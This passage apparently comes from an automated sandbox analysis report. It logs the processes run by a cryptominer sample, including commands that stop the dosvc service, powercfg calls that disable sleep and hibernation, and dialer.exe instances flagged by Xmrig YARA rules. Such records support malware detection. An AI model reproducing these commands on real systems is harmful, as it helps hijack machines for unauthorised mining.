                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:70
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:71
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:72
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:73
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:74
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:75
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:76
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:77
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:78
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dialer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                                                                                                                                                    Imagebase:0x7ff643940000
                                                                                                                                                                                                    File size:39'936 bytes
                                                                                                                                                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:79
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:80
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dialer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                                                                                                                                                    Imagebase:0x7ff643940000
                                                                                                                                                                                                    File size:39'936 bytes
                                                                                                                                                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:81
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dialer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:dialer.exe
                                                                                                                                                                                                    Imagebase:0x7ff643940000
                                                                                                                                                                                                    File size:39'936 bytes
                                                                                                                                                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:82
                                                                                                                                                                                                    Start time:13:59:52
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:83
                                                                                                                                                                                                    Start time:13:59:53
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:84
                                                                                                                                                                                                    Start time:13:59:53
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:85
                                                                                                                                                                                                    Start time:13:59:53
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:86
                                                                                                                                                                                                    Start time:13:59:53
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:87
                                                                                                                                                                                                    Start time:13:59:55
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:88
                                                                                                                                                                                                    Start time:13:59:55
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:89
                                                                                                                                                                                                    Start time:13:59:58
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:90
                                                                                                                                                                                                    Start time:13:59:58
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:91
                                                                                                                                                                                                    Start time:13:59:58
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:92
                                                                                                                                                                                                    Start time:13:59:59
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:93
                                                                                                                                                                                                    Start time:13:59:59
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:94
                                                                                                                                                                                                    Start time:13:59:59
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:95
                                                                                                                                                                                                    Start time:13:59:59
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:96
                                                                                                                                                                                                    Start time:13:59:59
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:97
                                                                                                                                                                                                    Start time:14:00:00
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:98
                                                                                                                                                                                                    Start time:14:00:01
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:99
                                                                                                                                                                                                    Start time:14:00:01
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:100
                                                                                                                                                                                                    Start time:14:00:01
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:101
                                                                                                                                                                                                    Start time:14:00:01
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:102
                                                                                                                                                                                                    Start time:14:00:02
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:103
                                                                                                                                                                                                    Start time:14:00:02
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:104
                                                                                                                                                                                                    Start time:14:00:02
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:105
                                                                                                                                                                                                    Start time:14:00:03
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:106
                                                                                                                                                                                                    Start time:14:00:03
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\spoolsv.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\spoolsv.exe
                                                                                                                                                                                                    Imagebase:0x7ff719eb0000
                                                                                                                                                                                                    File size:842'752 bytes
                                                                                                                                                                                                    MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:107
                                                                                                                                                                                                    Start time:14:00:04
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
